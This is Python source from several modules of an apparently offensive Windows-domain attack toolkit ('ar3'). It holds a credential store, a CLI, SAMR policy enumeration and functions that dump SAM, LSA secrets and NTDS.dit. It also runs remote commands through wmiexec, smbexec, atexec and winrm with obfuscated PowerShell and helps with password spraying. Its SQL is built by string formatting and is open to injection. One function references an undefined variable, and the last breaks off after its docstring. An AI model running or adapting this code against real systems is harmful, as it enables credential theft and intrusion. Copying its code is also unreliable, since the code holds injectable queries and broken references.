            tmp = self.db_exec(con, """SELECT USERS.USERID, USERS.DOMAIN, USERS.USERNAME, USERS.PASSWORD, USERS.HASH, (SELECT (COUNT(ADMINS.HOSTID) || ' Host(s)') FROM ADMINS WHERE ADMINS.USERID = USERS.USERID), (SELECT (COUNT(MEMBERS_USERS.GROUPID) || ' Groups(s)') FROM MEMBERS_USERS WHERE MEMBERS_USERS.USERID = USERS.USERID) FROM USERS ORDER BY USERS.USERNAME;""")
            con.close()
            return tmp
        except Exception as e:
            self.logger.debug(str(e))
            return [[]]

    def query_creds(self):
        """Return USERS rows that have a password or hash, or [[]] on error."""
        try:
            con = self.db_connect(self.dbname)
            tmp = self.db_exec(con, """SELECT USERS.USERID, USERS.DOMAIN, USERS.USERNAME, USERS.PASSWORD, USERS.HASH, (SELECT (COUNT(ADMINS.HOSTID) || ' Host(s)') FROM ADMINS WHERE ADMINS.USERID = USERS.USERID) FROM USERS WHERE USERS.hash iS NOT NULL OR USERS.PASSWORD IS NOT NULL;""")
            con.close()
            return tmp
        except Exception as e:
            self.logger.debug(str(e))
            return [[]]

    ###########################
    # Query specific value
    ###########################
    def custom_query(self, sql):
        """Run an arbitrary SQL string and return its rows, or [[]] on error."""
        try:
            con = self.db_connect(self.dbname)
            tmp = self.db_exec(con, sql)
            con.close()
            return tmp
        except Exception as e:
            self.logger.debug(str(e))
            return [[]]

    def query_spec_host(self, search):
        """Return host+admin rows matching the WHERE clause in *search*."""
        try:
            con = self.db_connect(self.dbname)
            tmp = self.db_exec(con, """SELECT HOSTS.HOSTID, HOSTS.DOMAIN, HOSTS.HOSTNAME, HOSTS.IP, HOSTS.OS, HOSTS.SIGNING, USERS.USERNAME, USERS.DOMAIN, USERS.PASSWORD, USERS.HASH FROM HOSTS INNER JOIN ADMINS ON HOSTS.HOSTID = ADMINS.HOSTID INNER JOIN USERS ON USERS.USERID = ADMINS.USERID WHERE {};""".format(search))
            con.close()
            return tmp
        except Exception as e:
            self.logger.debug(str(e))
            return [[]]

    ###############################
    # Extract value for use in Enum
    ###############################
    def extract_user(self, userid):
        # Used to extract creds from db for enumeration.
        # Returns [(USERNAME, PASSWORD, HASH, DOMAIN)] or [[]] on error.
        try:
            con = self.db_connect(self.dbname)
            tmp = self.db_exec(con, """SELECT USERNAME, PASSWORD, HASH, DOMAIN FROM USERS WHERE USERID={}""".format(userid))
            con.close()
            return tmp
        except Exception as e:
            return [[]]

    def extract_lockout(self, domain):
        """Return the stored lockout threshold for *domain*, or False."""
        tmp = False
        con = self.db_connect(self.dbname)
        try:
            id = self.domain_id(con, domain)
            tmp = self.db_exec(con, """SELECT LOCKOUT_THRESHOLD FROM DOMAINS WHERE DOMAINID={} LIMIT 1;""".format(id))[0][0]
        except:
            pass
        con.close()
        return tmp

    def extract_credID(self, username, domain, password, hash):
        """Return the USERID for the exact credential tuple, or False."""
        con = self.db_connect(self.dbname)
        id = self.cred_id(con, username, domain, password, hash)
        con.close()
        return id

    def pwd_check(self, domain, username):
        # Domain pwd spray helper: return the stored password for the
        # user (truthy => creds already known) or False.
        tmp = False
        con = self.db_connect(self.dbname)
        try:
            con = self.db_connect(self.dbname)
            tmp = self.db_exec(con, """SELECT PASSWORD FROM USERS WHERE DOMAIN='{}' AND USERNAME='{}' LIMIT 1""".format(domain, username))[0][0]
        except:
            pass
        con.close()
        return tmp
import os
import argparse
from sys import argv, exit
from getpass import getpass
from ipparser import ipparser
from ar3.core.ldap import LdapCon
from ar3.modules import list_modules
from ar3.helpers.misc import file_exists
from ar3.modules import get_module_resources
def enum_args(sub_parser):
    """Register the ``enum`` sub-command and all of its argument groups.

    Adds host-auth, enumeration, credential-dumping, WMI, module, spider,
    code-execution and targeting options to *sub_parser*.  ``-L`` is
    intercepted directly from ``sys.argv`` (before parsing) so the module
    list can be printed without requiring a target.

    Fixes vs. original:
      * ``-L`` was declared with ``type=str, default=''`` although it is a
        flag; it is now ``action='store_true'`` (still falsy by default,
        and the pre-parse intercept above exits before it matters).
      * typo "insead" -> "instead" in the ``--use-vss`` help text.
    """
    enum_parser = sub_parser.add_parser("enum", help='- System enumeration & Module execution')
    # Handled before argparse runs so '-L' works without any other args.
    if "-L" in argv:
        list_modules()
        exit(0)
    enum_parser.add_argument('-t', dest='timeout', type=int, default=12,help='Connection timeout')
    enum_parser.add_argument('--refresh', dest="refresh", action='store_true', help="Download/update PowerShell scripts")
    enum_parser.add_argument('--gen-relay-list', dest='gen_relay_list', type=str, default='', help='Create a file of all hosts that dont require SMB signing')
    auth = enum_parser.add_argument_group("Host Authentication")
    auth.add_argument('-u', dest='user', type=str, default='', required=False,help='Set username (Default=null)')
    auth_pwd = auth.add_mutually_exclusive_group(required=False)
    auth_pwd.add_argument('-H', '-hashes', dest='hash', type=str, default='', help='Use Hash for authentication')
    auth_pwd.add_argument('-p', dest='passwd', type=str, default='', help='Set password (Default=null)')
    auth.add_argument('-id', dest='cred_id', type=int, help='Use creds from db for ldap queries/enumeration')
    auth.add_argument('-d', dest='domain', type=str, default='', help='Set domain (Default=null)')
    auth.add_argument('--local-auth', dest='local_auth', action='store_true', help='Authenticate to target host, no domain')
    auth.add_argument('--threshold', dest='lockout_threshold', type=int, default=3,help='Domain/System Lockout Threshold ''(Exits 1 attempt before lockout)')
    enum = enum_parser.add_argument_group("Enumerating Options")
    enum.add_argument('--pass-pol', dest="passpol", action='store_true', help="Enumerate password policy")
    enum.add_argument('--loggedon', dest='loggedon', action='store_true', help='Enumerate logged on users')
    enum.add_argument('--sessions', dest='sessions', action='store_true', help='Enumerate active sessions')
    enum.add_argument('--services', dest='list_services', action='store_true', help='List services & status')
    enum.add_argument('-s', '--sharefinder', dest="sharefinder", action='store_true',help="Find open file shares & check access")
    creds = enum_parser.add_argument_group("Gathering Credentials")
    creds.add_argument('--sam', dest='sam', action='store_true', help='Dump local SAM db')
    creds.add_argument('--lsa', dest='lsa', action='store_true', help='Extract LSA Secrets')
    creds.add_argument('--ntds', dest='ntds', action='store_true', help='Extract NTDS.dit file')
    creds.add_argument('--use-vss', action='store_true', default=False, help='Use the VSS method instead of default DRSUAPI')
    wmi = enum_parser.add_argument_group("WMI Query")
    wmi.add_argument('--tasklist', dest='list_processes', action='store_true', help='Show running processes')
    wmi.add_argument('--local-groups', dest='local_groups', action='store_true', help='List system local groups')
    wmi.add_argument('--local-members', dest='local_members', type=str, default='', help='List local group members')
    wmi.add_argument('--wmi', dest='wmi_query', type=str, default='', help='Execute WMI query')
    wmi.add_argument('--wmi-namespace', dest='wmi_namespace', type=str, default='root\\cimv2', help='WMI namespace (Default: root\\cimv2)')
    modules = enum_parser.add_argument_group("Module Execution")
    modules.add_argument('-M', dest='module', type=str, default='', help='Use AR3 module')
    modules.add_argument('-o', dest='module_args', type=str, default='', help='Provide AR3 module arguments')
    # '-L' is a flag (see intercept above); store_true keeps args.list_modules falsy by default.
    modules.add_argument('-L', dest='list_modules', action='store_true', help='List all available modules')
    modules.add_argument('--reload', dest='module_reload', action='store_true', help='ReDownload module resources')
    spider = enum_parser.add_argument_group("Spidering")
    spider.add_argument('--spider', dest='spider', action='store_true',help='Crawl file share and look for sensitive info')
    spider.add_argument('--depth', dest='max_depth', type=int, default=5, help='Set scan depth (Default: 3)')
    spider.add_argument('--share', dest='share', type=str, default='', help='Define network share to scan: \'C$\'')
    spider.add_argument('--path', dest='start_path', type=str, default='/', help='Define starting path for share: \'/Windows/Temp/\'')
    spider.add_argument('--filename', dest="filename_only", action='store_true', help="Scan Filenames & extensions only")
    execution = enum_parser.add_argument_group("Command Execution")
    ps1exec = execution.add_mutually_exclusive_group(required=False)
    ps1exec.add_argument('-x', dest='execute', type=str, default='', help='Command to execute on remote server')
    ps1exec.add_argument('-X', dest='ps_execute', type=str, default='', help='Execute command with PowerShell')
    execution.add_argument('--force-ps32', dest='force_ps32', action='store_true',help='Run PowerShell command in a 32-bit process')
    execution.add_argument('--no-obfs', dest='no_obfs', action='store_true', help='Do not obfuscate PowerShell commands')
    execution.add_argument('--exec-method', dest='exec_method', choices=['wmiexec', 'smbexec','atexec', 'winrm'], default='wmiexec',help='Code execution method {wmiexec, smbexec, atexec, winrm}')
    execution.add_argument('--exec-ip', dest='exec_ip', type=str, default='127.0.0.1', help='Set server used for code execution output')
    execution.add_argument('--exec-share', dest='exec_share', type=str, default='C$',help='Set share used for code execution output')
    execution.add_argument('--exec-path', dest='exec_path', type=str, default='\\Windows\\Temp\\', help='Set path used for code execution output')
    execution.add_argument('--fileless', dest='fileless', action='store_true',help='Spawn SMB server for code execution output')
    execution.add_argument('--fileless_sharename', dest='fileless_sharename', type=str, default='', help=argparse.SUPPRESS)
    execution.add_argument('--no-output', dest='no_output', action='store_true', help='Execute command with no output')
    execution.add_argument('--slack', dest='slack', action='store_true',help='Send execution output to Slack (Config required)')
    target = enum_parser.add_argument_group("Target Options")
    targets = target.add_mutually_exclusive_group(required=True)
    targets.add_argument(dest='target', nargs='?', help='Positional argument, Accepts: target.txt, 127.0.0.0/24, ranges, 192.168.1.1')
    targets.add_argument('--ldap', dest='ldap', action='store_true', help='Use LDAP to target all domain systems')
    targets.add_argument('--eol', dest='eol', action='store_true', help='Use LDAP to target end-of-life systems on the domain')
    target.add_argument('--ldap-srv', dest='ldap_srv', type=str, default='', help='Define LDAP server (Optional)')
def enum_arg_mods(args, db_obj, loggers):
    """Post-parse fixups for the ``enum`` sub-command.

    Resolves credentials (save-to-db, -id lookup, interactive prompt),
    optionally expands the target list via LDAP (--ldap/--eol), and syncs
    the domain lockout threshold with the database.  Returns the mutated
    ``args`` namespace.  May call ``exit()`` on fatal errors or after
    completing --reload.
    """
    logger = loggers['console']
    # Minimal namespace handed to LdapCon for LDAP targeting; credential
    # fields default to False and are filled in below when LDAP is used.
    context = argparse.Namespace(
        mode       = args.mode,
        timeout    = args.timeout,
        local_auth = False,
        debug      = args.debug,
        user       = False,
        passwd     = False,
        hash       = False,
        domain     = False,
    )
    # Check for user creds in db, QoL addition
    cred_id = db_obj.extract_credID(args.user, args.domain, args.passwd, args.hash)
    if cred_id:
        logger.status(['Credentials Saved', 'Next time try: -id {}'.format(str(cred_id))])
    # ReDownload module resources
    if args.module_reload:
        logger.status('Reloading module resources...')
        get_module_resources()
        logger.status_success('Scripts updated at: {}'.format(os.path.join(os.path.expanduser('~'), '.ar3', 'scripts')))
        exit(0)
    # Ask user for creds if user present and no password
    if not args.passwd and args.user and not args.hash:
        args.passwd = getpass("Enter password, or continue with null-value: ")
    # Cred ID present & no user/pass provided, for us in enumeration
    elif args.cred_id and "-u" not in argv:
        # DB row layout: (user, passwd, hash, domain) -- same order below.
        enum_user   = db_obj.extract_user(args.cred_id)
        args.user   = enum_user[0][0]
        args.passwd = enum_user[0][1]
        args.hash   = enum_user[0][2]
        args.domain = enum_user[0][3]
    # Gather target systems using ldap
    if args.ldap or args.eol:
        if args.cred_id:
            ldap_user      = db_obj.extract_user(args.cred_id)
            context.user   = ldap_user[0][0]
            context.passwd = ldap_user[0][1]
            context.hash   = ldap_user[0][2]
            context.domain = ldap_user[0][3]
        elif args.domain and args.user:
            context.user   = args.user
            context.passwd = args.passwd
            context.hash   = args.hash
            context.domain = args.domain
        else:
            logger.warning("To use the LDAP feature, please select a valid credential ID or enter domain credentials")
            logger.warning("Insert credentials:\n\tactivereign db insert -u username -p Password123 -d domain.local")
            exit(0)
        if context.hash:
            logger.status(['LDAP Authentication', '{}\{} (Password: None) (Hash: True)'.format(context.domain, context.user)])
        else:
            # Only the first password character is shown, rest is masked.
            logger.status(['LDAP Authentication', '{}\{} (Password: {}*******) (Hash: False)'.format(context.domain, context.user, context.passwd[:1])])
        try:
            l = LdapCon(context, loggers, args.ldap_srv, db_obj)
            l.create_ldap_con()
            if not l:
                logger.status_fail(['LDAP Connection', 'Unable to create LDAP connection'])
                exit(1)
            logger.status_success(['LDAP Connection', 'Connection established (server: {}) (LDAPS: {})'.format(l.host, l.ldaps)])
            # Replace the target spec with hostnames pulled from LDAP;
            # 'eol' restricts the query to end-of-life operating systems.
            if args.ldap:
                args.target = list(l.computer_query(False, []).keys())
            elif args.eol:
                args.target = list(l.computer_query('eol', []).keys())
            logger.status_success(['LDAP Connection','{} computers collected'.format(len(args.target))])
        except Exception as e:
            if "invalidCredentials" in str(e):
                logger.fail(["LDAP Error", "Authentication failed"])
            else:
                logger.fail(["LDAP Error", str(e)])
            exit(1)
    else:
        # No LDAP: expand the positional target (file, CIDR, range, single IP).
        args.target = ipparser(args.target)
    # Lockout threshold: prefer the db value unless the user overrode it.
    if "--threshold" not in argv:
        tmp = db_obj.extract_lockout(args.domain)
        if tmp:
            args.lockout_threshold = tmp
            logger.status(["Lockout Tracker", "Threshold extracted from database: {}".format(str(tmp))])
        else:
            logger.status(["Lockout Tracker", "Using default lockout threshold: {}".format(str(args.lockout_threshold))])
    else:
        db_obj.update_domain(args.domain, args.lockout_threshold)
        logger.status(["Lockout Tracker", "Updating {} threshold in database to: {}".format(args.domain, str(args.lockout_threshold))])
    if args.hash:
        logger.status(['Enum Authentication', '{}\{} (Password: None) (Hash: True)'.format(args.domain, args.user)])
    else:
        logger.status(['Enum Authentication', '{}\{} (Password: {}****) (Hash: False)'.format(args.domain, args.user, args.passwd[:1])])
    # Close the LDAP connection if one was opened above.
    if 'l' in locals():
        l.close()
    return args
from time import strftime, gmtime
from impacket.dcerpc.v5.rpcrt import DCERPC_v5
from impacket.dcerpc.v5 import transport, samr
from ar3.logger import highlight
def d2b(a):
    """Return non-negative int *a* as a binary string zero-padded to 6 digits.

    Used to render the SAMR ``PasswordProperties`` bit field, which defines
    exactly 6 flags (see PASSCOMPLEX in SAMRDump.__pretty_print).  The
    original implementation checked ``len != 8`` but padded toward 6 digits,
    which only worked because the field never exceeds 6 bits.
    ``format(a, '06b')`` reproduces the original output for every
    non-negative input: narrower values are left-padded with zeros, wider
    values are emitted in full.
    """
    return format(a, '06b')
def convert(low, high, lockout=False):
    """Translate a Windows FILETIME-style (low, high) DWORD pair into a
    human-readable duration such as ``"1 day 2 hours 30 minutes "``.

    The SAMR sentinels are mapped to ``"Not Set"`` (never expires) and
    ``"None"``.  When *lockout* is true only *high* is interpreted, as the
    lockout fields already arrive as a single tick count.
    """
    # Sentinel values used by the domain password/lockout policy fields.
    if low == 0 and hex(high) == "-0x80000000":
        return "Not Set"
    if low == 0 and high == 0:
        return "None"

    if lockout:
        seconds = abs(high) * (1e-7)
    else:
        if low != 0:
            high = abs(high + 1)
        else:
            high = abs(high)
        low = abs(low)
        # Recombine the halves into a 64-bit tick count (100ns units),
        # then scale down to seconds.
        seconds = (low + high * 16 ** 8) * (1e-7)

    try:
        minutes = int(strftime("%M", gmtime(seconds)))
        hours = int(strftime("%H", gmtime(seconds)))
        days = int(strftime("%j", gmtime(seconds))) - 1
    except:
        return "[-] Invalid TIME"

    # Assemble "<n> unit " fragments, choosing singular vs plural;
    # zero-valued units are omitted entirely.
    result = ""
    for amount, singular, plural in ((days, "day", "days"),
                                     (hours, "hour", "hours"),
                                     (minutes, "minute", "minutes")):
        if amount > 1:
            result += "{0} {1} ".format(amount, plural)
        elif amount == 1:
            result += "{0} {1} ".format(amount, singular)
    return result
class SAMRDump:
    """Query a host's domain password/lockout/logoff policy over MS-SAMR.

    ``dump()`` connects to the SAMR named pipe (trying port 139 then 445),
    opens the first enumerated domain, reads the password, lockout and
    logoff information classes, and pretty-prints the results through the
    supplied logger.  The discovered lockout threshold is left in
    ``self.threshold`` for callers to persist.
    """
    # SMB named-pipe transports tried in order by dump().
    KNOWN_PROTOCOLS = {
        '139/SMB': (r'ncacn_np:{}[\pipe\samr]', 139),
        '445/SMB': (r'ncacn_np:{}[\pipe\samr]', 445),
        }
    def __init__(self, con, debug, logger):
        self.logger = logger
        self.debug = debug
        # Lockout threshold found by __fetchList; read by callers after dump().
        self.threshold = 0
        self._connection = con
        self.__username = con.username
        self.__password = con.password
        self.__protocols = SAMRDump.KNOWN_PROTOCOLS.keys()
    def dump(self, addr):
        """Dumps the list of users and shares registered present at
        addr. Addr is a valid host name or IP address.
        """
        # Try all requested protocols until one works.
        for protocol in self.__protocols:
            protodef = SAMRDump.KNOWN_PROTOCOLS[protocol]
            port = protodef[1]
            rpctransport = transport.SMBTransport(addr, port, r'\samr',self.__username, self.__password)
            try:
                self.__fetchList(rpctransport)
            except Exception as e:
                self.logger.debug("PolEnum: Protocol failed: {0}".format(e))
            else:
                # Got a response. No need for further iterations.
                self.__pretty_print()
                break
    def __fetchList(self, rpctransport):
        """Bind to SAMR over *rpctransport* and populate the policy fields.

        Raises on any non-zero SAMR error code so dump() can fall through
        to the next transport.
        """
        dce = DCERPC_v5(rpctransport)
        dce.connect()
        dce.bind(samr.MSRPC_UUID_SAMR)
        # Setup Connection
        resp = samr.hSamrConnect2(dce)
        if resp['ErrorCode'] != 0:
            raise Exception('Connect error')
        # Enumerate domains hosted by the server; the first one is used below.
        resp2 = samr.hSamrEnumerateDomainsInSamServer(
            dce,
            serverHandle=resp['ServerHandle'],
            enumerationContext=0,
            preferedMaximumLength=500)
        if resp2['ErrorCode'] != 0:
            raise Exception('Connect error')
        resp3 = samr.hSamrLookupDomainInSamServer(
            dce,
            serverHandle=resp['ServerHandle'],
            name=resp2['Buffer']['Buffer'][0]['Name'])
        if resp3['ErrorCode'] != 0:
            raise Exception('Connect error')
        resp4 = samr.hSamrOpenDomain(dce, serverHandle=resp['ServerHandle'],
                                     desiredAccess=samr.MAXIMUM_ALLOWED,
                                     domainId=resp3['DomainId'])
        if resp4['ErrorCode'] != 0:
            raise Exception('Connect error')
        self.__domains = resp2['Buffer']['Buffer']
        domainHandle = resp4['DomainHandle']
        # End Setup
        # Password policy (min length, history, min/max age, complexity flags).
        domain_passwd = samr.DOMAIN_INFORMATION_CLASS.DomainPasswordInformation
        re = samr.hSamrQueryInformationDomain2(
            dce, domainHandle=domainHandle,
            domainInformationClass=domain_passwd)
        self.__min_pass_len = re['Buffer']['Password']['MinPasswordLength'] \
            or "None"
        pass_hist_len = re['Buffer']['Password']['PasswordHistoryLength']
        self.__pass_hist_len = pass_hist_len or "None"
        self.__max_pass_age = convert(
            int(re['Buffer']['Password']['MaxPasswordAge']['LowPart']),
            int(re['Buffer']['Password']['MaxPasswordAge']['HighPart']))
        self.__min_pass_age = convert(
            int(re['Buffer']['Password']['MinPasswordAge']['LowPart']),
            int(re['Buffer']['Password']['MinPasswordAge']['HighPart']))
        # Bit field rendered via d2b for per-flag display in __pretty_print.
        self.__pass_prop = d2b(re['Buffer']['Password']['PasswordProperties'])
        # Lockout policy (observation window, duration, threshold).
        domain_lockout = samr.DOMAIN_INFORMATION_CLASS.DomainLockoutInformation
        re = samr.hSamrQueryInformationDomain2(
            dce, domainHandle=domainHandle,
            domainInformationClass=domain_lockout)
        self.__rst_accnt_lock_counter = convert(
            0,
            re['Buffer']['Lockout']['LockoutObservationWindow'],
            lockout=True)
        self.__lock_accnt_dur = convert(
            0,
            re['Buffer']['Lockout']['LockoutDuration'],
            lockout=True)
        self.__accnt_lock_thres = re['Buffer']['Lockout']['LockoutThreshold'] \
            or "None"
        # Forced logoff policy.
        domain_logoff = samr.DOMAIN_INFORMATION_CLASS.DomainLogoffInformation
        re = samr.hSamrQueryInformationDomain2(
            dce, domainHandle=domainHandle,
            domainInformationClass=domain_logoff)
        self.__force_logoff_time = convert(
            re['Buffer']['Logoff']['ForceLogoff']['LowPart'],
            re['Buffer']['Logoff']['ForceLogoff']['HighPart'])
    def __pretty_print(self):
        """Log the collected policy values and publish the lockout threshold."""
        # Names for the 6 PasswordProperties bits, indexed by position in
        # the d2b() string (most-significant bit first).
        PASSCOMPLEX = {
            5: 'Domain Password Complex:',
            4: 'Domain Password No Anon Change:',
            3: 'Domain Password No Clear Change:',
            2: 'Domain Password Lockout Admins:',
            1: 'Domain Password Store Cleartext:',
            0: 'Domain Refuse Password Change:'
        }
        self.logger.info([self._connection.host, self._connection.ip, "POLENUM", "Minimum password length: {0}".format(self.__min_pass_len)])
        self.logger.info([self._connection.host, self._connection.ip, "POLENUM", "Password history length: {0}".format(self.__pass_hist_len)])
        self.logger.info([self._connection.host, self._connection.ip, "POLENUM", "Maximum password age: {0}".format(self.__max_pass_age)])
        self.logger.info([self._connection.host, self._connection.ip, "POLENUM", "Password Complexity Flags: {0}".format(self.__pass_prop or "None")])
        for i, a in enumerate(self.__pass_prop):
            self.logger.info([self._connection.host, self._connection.ip, "POLENUM", "\t{0} {1}".format(PASSCOMPLEX[i], str(a))])
        self.logger.info([self._connection.host, self._connection.ip, "POLENUM", "Minimum password age: {0}".format(self.__min_pass_age)])
        self.logger.info([self._connection.host, self._connection.ip, "POLENUM", "Reset Account Lockout Counter: {0}".format(self.__rst_accnt_lock_counter)])
        self.logger.info([self._connection.host, self._connection.ip, "POLENUM", "Locked Account Duration: {0}".format(self.__lock_accnt_dur)])
        self.logger.info([self._connection.host, self._connection.ip, "POLENUM", "Account Lockout Threshold: {0}".format( self.__accnt_lock_thres)])
        self.logger.info([self._connection.host, self._connection.ip, "POLENUM", "Forced Log off Time: {0}".format(self.__force_logoff_time)])
        # Exposed for password_policy() to store in the database.
        self.threshold = self.__accnt_lock_thres
from os import _exit
from threading import Thread
from ar3.core.wmi import WmiCon
from ar3.core.rpc import RpcCon
from ar3.core.smb import SmbCon
from ar3.logger import highlight
from ar3.core.winrm import WINRM
from ar3.helpers import powershell
from ar3.core.wmiexec import WMIEXEC
from ar3.core.smbexec import SMBEXEC
from ar3.core.atexec import TSCHEXEC
from ar3.helpers.misc import slack_post
from ar3.ops.enum.polenum import SAMRDump
from ar3.ops.enum.share_finder import share_finder
from ar3.modules import get_module_class, populate_mod_args
from ar3.ops.enum.code_execution import ExecutionTimeout
def requires_admin(func):
    """Decorator: run *func* only when the connection has admin rights.

    The wrapped callable expects the SMB connection object as its first
    argument; when ``con.admin`` is falsy the call is skipped and ``False``
    is returned instead.
    """
    def wrapper(con, *args, **kwargs):
        if con.admin:
            return func(con, *args, **kwargs)
        return False
    return wrapper
def smb_login(args, loggers, host, db, lockout_obj, config_obj):
    """Connect to *host* over SMB, attempt authentication, and log a
    one-line host summary (OS, domain, signing, SMBv1) with a colour-coded
    auth status.

    Failed logins are reported to *lockout_obj* so the run can stop before
    triggering account lockout.  Returns the SmbCon object (caller is
    responsible for closing it); raises when the initial SMB connection
    cannot be established.
    """
    status = ''
    smb = SmbCon(args, loggers, host, db)
    if smb.smb_connection():
        smb.host_info()
        try:
            smb.login()
            if smb.admin:
                status = "({})".format(highlight(config_obj.PWN3D_MSG, 'yellow'))
            elif smb.auth and args.user:
                status = "({})".format(highlight('Success', 'green'))
        except Exception as e:
            # Classify the failure by substring-matching the lowercased error.
            e = str(e).lower()
            lockout_obj.failed_login(host, str(e).lower())
            if "password_expired" in e:
                status = "({})".format(highlight('Password_Expired', 'yellow'))
            elif "logon_failure" in e:
                # Only genuine bad-credential failures count toward lockout.
                lockout_obj.add_attempt()
                status = "({})".format(highlight('Failed', 'red'))
            elif "account_disabled" in e:
                status = "({})".format(highlight('Account_Disabled', 'red'))
            elif args.user:
                # Unknown error: show the first 40 chars inline.
                status = "({})".format(highlight(e[:40], 'red'))
        loggers['console'].info([smb.host, smb.ip, "ENUM", "{} {} ".format(smb.os, smb.os_arch), "(Domain: {})".format(smb.srvdomain),"(Signing: {})".format(str(smb.signing)), "(SMBv1: {})".format(str(smb.smbv1)), status])
        return smb
    else:
        raise Exception('Connection to Server Failed')
def password_policy(con, args, db_obj, loggers):
    """Dump the domain password policy over SAMR and persist the lockout
    threshold in the database (a threshold of "None" is stored as 99).

    Raises when the policy could not be enumerated.
    """
    dumper = SAMRDump(con, args.debug, loggers['console'])
    dumper.dump(con.ip)
    threshold = dumper.threshold
    if not threshold:
        raise Exception('Enumerating password policy failed')
    if threshold == "None":
        loggers['console'].status('Lockout threshold: None, setting threshold to 99 in database for {}'.format(con.domain))
        db_obj.update_domain(con.domain, 99)
    else:
        loggers['console'].status('Lockout threshold detected, setting threshold to {} in database for {}'.format(threshold, con.domain))
        db_obj.update_domain(con.domain, threshold)
@requires_admin
def code_execution(con, args, target, loggers, config_obj, payload, return_data=False):
    """Execute *payload* on *target* using the selected exec method
    (wmiexec/smbexec/atexec/winrm); admin access required (decorator gate).

    Execution runs in a worker thread bounded by ``args.timeout + 5``
    seconds.  Output is optionally posted to Slack; when *return_data* is
    true the raw output string is returned instead of being logged line
    by line.
    """
    # Implement Execution Method
    if args.exec_method.lower() == 'wmiexec':
        executioner = WMIEXEC(loggers['console'], target, args, con, share_name=args.fileless_sharename)
    elif args.exec_method.lower() == 'smbexec':
        executioner = SMBEXEC(loggers['console'], target, args, con, share_name=args.fileless_sharename)
    elif args.exec_method.lower() == 'atexec':
        executioner = TSCHEXEC(loggers['console'], target, args, con, share_name=args.fileless_sharename)
    elif args.exec_method.lower() == 'winrm':
        executioner = WINRM(loggers['console'], target, args, con, share_name=False)
    # Log action to file
    loggers[args.mode].info("Code Execution\t{}\t{}\\{}\t{}".format(target, args.domain, args.user, payload))
    # Spawn thread for code execution timeout
    timer = ExecutionTimeout(executioner, payload)
    exe_thread = Thread(target=timer.execute)
    exe_thread.start()
    exe_thread.join(args.timeout+5)
    # Signal the worker to stop if it is still running after the join timeout.
    exe_thread.running = False
    # CMD Output
    if args.slack and config_obj.SLACK_API and config_obj.SLACK_CHANNEL:
        post_data = "[Host: {}]\t[User:{}]\t[Command:{}]\r\n{}".format(con.host, args.user, payload, timer.result)
        slack_post(config_obj.SLACK_API, config_obj.SLACK_CHANNEL, post_data)
    # Return to module not print
    if return_data:
        return timer.result
    for line in timer.result.splitlines():
        loggers['console'].info([con.host, con.ip, args.exec_method.upper(), line])
@requires_admin
def ps_execution(con,args,target,loggers):
    """Wrap ``args.ps_execute`` in a (optionally obfuscated, optionally
    32-bit) PowerShell launcher and run it via code_execution, printing
    each output line.  Errors are only surfaced in debug output.
    """
    try:
        cmd = powershell.create_ps_command(args.ps_execute, loggers['console'], force_ps32=args.force_ps32, no_obfs=args.no_obfs, server_os=con.os)
        result = code_execution(con, args, target, loggers, config_obj, cmd, return_data=True)
        for line in result.splitlines():
            loggers['console'].info([con.host, con.ip, args.exec_method.upper(), line])
    except Exception as e:
        loggers['console'].debug([con.host, con.ip, args.exec_method.upper(), str(e)])
@requires_admin
def extract_lsa(con, args, target, loggers):
    """Extract LSA secrets from the target (admin required)."""
    # Record the operation in the mode-specific audit log before acting.
    entry = "Extract LSA\t{}\t{}\\{}".format(target, args.domain, args.user)
    loggers[args.mode].info(entry)
    con.lsa()
@requires_admin
def extract_sam(con, args, target, loggers):
    """Dump the local SAM database from the target (admin required)."""
    # Record the operation in the mode-specific audit log before acting.
    entry = "Extract SAM\t{}\t{}\\{}".format(target, args.domain, args.user)
    loggers[args.mode].info(entry)
    con.sam()
@requires_admin
def extract_ntds(con, args, target, loggers):
    """Extract the NTDS.dit file from the target DC (admin required)."""
    # Record the operation in the mode-specific audit log before acting.
    entry = "Dumping NTDS.DIT\t{}\t{}\\{}".format(target, args.domain, args.user)
    loggers[args.mode].info(entry)
    con.ntds()
@requires_admin
def loggedon_users(con, args, target, loggers):
    """Enumerate logged-on users on the target over RPC (admin required).

    Each user is printed with its logon server when one is reported.
    """
    rpc = RpcCon(args, loggers, target)
    rpc.get_netloggedon()
    for account, info in rpc.loggedon.items():
        if info['logon_srv']:
            loggers['console'].info([con.host, con.ip, "LOGGEDON", '{}\{:<25}'.format(info['domain'], account), "Logon_Server: {}".format(info['logon_srv'])])
        else:
            loggers['console'].info([con.host, con.ip, "LOGGEDON", '{}\{}'.format(info['domain'], account)])
def active_sessions(con, args, target, loggers):
    """List active SMB sessions on the target over RPC (no admin required)."""
    rpc = RpcCon(args, loggers, target)
    rpc.get_netsessions()
    for account, info in rpc.sessions.items():
        loggers['console'].info([con.host, con.ip, "SESSIONS", account, "Host: {}".format(info['host'])])
@requires_admin
def tasklist(con, args, loggers):
    """Show the target's running processes via WMI (admin required)."""
    WmiCon(args, loggers, con.ip, con.host).get_netprocess(tasklist=True)
@requires_admin
def list_services(con, args, loggers, target):
    """Enumerate Windows services and their status over RPC (admin required)."""
    rpc = RpcCon(args, loggers, target)
    for svc in rpc.list_services().values():
        loggers['console'].info([con.host, con.ip, "SERVICES", "{:<25} {:<12} {}".format(svc['Name'], svc['Status'], svc['Display'])])
@requires_admin
def wmi_query(con, args, target, loggers):
    """Run the user-supplied WMI query against the target (admin required),
    logging the action to the mode-specific audit log first."""
    runner = WmiCon(args, loggers, con.ip, con.host)
    loggers[args.mode].info("WMI Query\t{}\t{}\\{}\t{}".format(target, args.domain, args.user, args.wmi_query))
    runner.wmi_query(args.wmi_namespace, args.wmi_query)
@requires_admin
def get_netlocalgroups(con, args, target, loggers):
    """List the target's local groups via WMI (admin required)."""
    wmic = WmiCon(args, loggers, con.ip, con.host)
    # Audit-log the query before executing it.
    loggers[args.mode].info("WMI Query\t{}\t{}\\{}\tEnumerate Local Groups".format(target, args.domain, args.user))
    wmic.get_netlocalgroups()
@requires_admin
def localgroup_members(smb_obj, args, target, loggers):
    """List members of the local group named by ``args.local_members``
    via WMI (admin required)."""
    wmic = WmiCon(args, loggers, smb_obj.ip, smb_obj.host)
    # Audit-log the query before executing it.
    loggers[args.mode].info("WMI Query\t{}\t{}\\{}\tEnumerate Local Groups".format(target, args.domain, args.user))
    wmic.get_localgroup_members(smb_obj.con.getServerName(), args.local_members)
def execute_module(con, args, target, loggers, config_obj):
    """Load and run the AR3 module named by ``args.module`` against *target*.

    Enforces the module's own constraints (admin requirement, supported
    exec methods) before populating its arguments from ``args.module_args``
    and invoking ``run()``.  All failures are logged, never raised.
    """
